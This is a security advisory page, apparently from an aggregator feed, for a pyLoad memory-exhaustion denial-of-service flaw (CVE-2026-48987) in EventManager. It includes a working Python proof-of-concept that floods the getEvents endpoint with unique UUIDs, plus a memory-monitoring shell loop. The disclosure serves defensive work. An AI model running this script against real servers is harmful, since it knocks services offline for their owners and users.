CSIRTS // UNIFIED SECURITY ADVISORY FEEDSYS ● ONLINE · POWERED BY INTELFUSIONS.COM

GHSA-c2f9-4mc8-j656: pyLoad: Unbounded Memory Growth Leading to DoS and Potential DDoS in EventManager

mediumCVSS 6.5CVE-2026-48987
Description: The EventManager module in pyload manages a list of Client instances for subscribing to events. The addition of each unique uuid from the get_events API causes the creation of a Client instance that gets appended to the clients list. Although there is a clean() method available in the EventManager module for removing non-responding Client instances, this method is never used in the EventManager or in the entire core application code. Consequently, this causes an uncontrolled growth in memory consumption until it becomes exhausted, resulting in a DoS attack. Vulnerable Code: https://github.com/pyload/pyload/blob/355c3f8d78a91f72d049e58f1edee8a972f845eb/src/pyload/core/managers/event_manager.py#L16-L17 Here the client is added to the clients list but never cleared the inactive clients. Exploitation: 1. Start pyLoad server (Ensure the pyload server is running) 2. Authenticate: Obtain a session cookie or an API key (Here i used the API key). 3. Send Requests: Run the below poc script to send a large number of requests to the getEvents API endpoint, each with a unique uuid. import requests import uuid import time Configuration URL = "http://localhost:8000/api/getEvents" NUM_REQUESTS = 100000 headers = { "X-API-Key" : "<YOUR_APIKEY>" } print(f"Starting DoS attack: sending {NUM_REQUESTS} unique UUIDs...") for i in range(NUM_REQUESTS): Generating a new UUID uid = str(uuid.uuid4()) try: Sending request requests.get(URL, params={"uuid": uid}, headers=headers, timeout=5) if i % 1000 == 0: print(f"Sent {i} requests...") except requests.exceptions.RequestException as e: print(f"Error at request {i}: {e}") break print("Attack complete. Check memory usage.") 5. Monitor Memory: Monitor the memory usage of the pyload process (e.g., using top, ps or the following commands). PID=$(pgrep -f "pyload"); while true; do ps -o rss= -p $PID; sleep 1; done 6. Observe Growth: Notice that the memory consumption increases and never decreases, even after the requests

Details

Source
GitHub Security Advisories (INTL · database · site)
Severity
medium — CVSS 6.5
Published
2026-07-09
Last updated
2026-07-09
Exploitation
Not in CISA KEV at last sync

Original advisory: https://github.com/advisories/GHSA-c2f9-4mc8-j656

Referenced CVEs

CVECSIRTS overviewExternal
CVE-2026-48987coverage & exploitation statusNVD · CVE.org

More from GitHub Security Advisories